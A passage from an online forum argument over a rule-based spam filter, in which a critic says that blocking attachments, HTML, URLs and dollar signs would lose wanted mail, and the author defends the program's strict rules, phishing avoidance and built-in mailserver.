The way I see it, someone sending you unsolicited email for the very first time have absolutely no need to send you file attachments, HTML (looking content), quoted printable (looking) content, percent signs, dollar signs, numbers, URLs (or URL-like content), or email addresses (or email address-like content).
Again, that's nice for you, but many, many people get attachments they want, html email they want (from webmail accounts, for example), mentions of a new email address or a sig with an email address, mention of the cost of something ("I got those tickets we talked about, and it turned out that they were only $30 after all!"), etc.
The bottom line is that your approach may work well for you, but would work very poorly for most people. Some of the solutions you critisize don't work at all the way you think--I suggest that you look at spamassassin's non-learning setup before you bash it again, for example, and find some real arguments against it. You keep saying that uncomplicated rules are unnecessary, but then point out that your method will delete emails just for happening to to contain certain charaters.
I don't know why I'm bothering. You keep pasting in chunks of other emails that are unrelated (critiques of baysian filtering, which I'm not even talking about, legality, which I'm not even talking about) and quoting only the very specific parts of my post you can address and ignore my more important, specific points. The only conclusion I can draw is that you prefer to keep your head in the sand and post PR statements rather than increase your knowledge of the solutions you are competing with and address the real shortcomings of your program, so that you can blame your lack of fame and success on conspiracy theories. That's a workable solution only if your goal is to continue not to be taken seriously.
Right now I am using my program on my public, unhidden, unobsfucated email address where first time correspondents can contact me. If, via that point of contact, they need to send me a file attachment, HTML, or whatever, I can give them a private email address I use. There was a recent Slashdot story about the Secret Service breaking up a 'phisher'/carding ring to much fanfare. Not long after that, I checked my email at this private address and got a eBay 'phish'. I was expecting to hear from someone I haven't contacted in awhile, not an attempt at fraud and identity theft. Anyway I figured out how I could filter the 'phish' emails out for good. I just went to the ecommerce sites I do business with and verified I get only plain text email. Now all I have to do is configure my program to filter out all emails bearing file attachments or HTML on my private email address. It'll just take me a minute or two to do this. I do have another (semi)private address where such content could be sent to me if needed.
Anyway, I wrote the software because I was genuinely tired of all the spam I got and did something constructive about it. This is after dealing with piles of unwanted email sent by 'manual spammers' at a web-based email account I still have. Why do I call them 'manual spammers'? Because they (must have) read my email address off an image file at an old website of mine and manually added my email address to their lists or quite possibly used a 'dictionary attack' to spam me. This is why I never gave out a POP3 email address until a few months ago because I didn't wan't Outlook downloading and saving spam and malware--so I have my software deal with it instead.
However, to get back to your response above, I could add statistical support to the 8 criteria I am using. But doing that would make my software no different from the others that have this support in them.
So then what is so unique about my email filtering programs over the others?
My program puts the user in 100% complete control of the email they retrieve from their inbox.
With the statistical approach, admirable as it may be, has a chance for error (false positives) be it a small chance.
With my rule-based approach, there is (unfortunately) no middle ground, degrees of freedom, or complex mathematical calculations needed: either the incoming email is acceptable to the rules or not.
The user has the option with my program to save these unacceptable messages so there is no chance of having important email deleted--it is identified (mistakenly) as spam after being 'sanitized' for possible review and use.
My programs are a complete email client and mailserver both with built-in email filtering. All the other solutions I came accross on the internet need a mailserver or email client in order to work.
In closing, I want to say that 'bowing to market forces' and adding in statistical modeling, or lots and lots of custom rulesets would make my programs no different than the likes of CRM114, DSPAM, or SpamAssassin: statistical modeling or complicated rulesets can use lots of space and bog the CPU down with lots of calculations. If you are in a hurry, you'd probably have to dedicate a PC to do nothing but check email in such an environment. I wanted to make a simple, efective mail filter and was partly inspired to do so by this quote: